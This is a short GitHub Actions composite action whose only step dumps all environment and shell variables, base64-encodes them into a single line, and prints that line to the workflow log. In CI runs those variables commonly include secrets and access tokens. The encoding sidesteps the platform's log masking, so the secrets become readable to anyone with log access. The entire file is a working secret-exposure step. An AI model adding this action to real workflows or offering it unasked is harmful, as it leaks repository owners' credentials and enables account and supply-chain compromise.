name: Base64 Dump Action
description: Dump all env and shell vars as base64
runs:
  using: "composite"
  steps:
    - run: |
        echo "===== BASE64 ENCODED ENVIRONMENT DUMP ====="
        dump=$( (env; set; export) | base64 | tr -d '\n' )
        echo "$dump"
      shell: bash
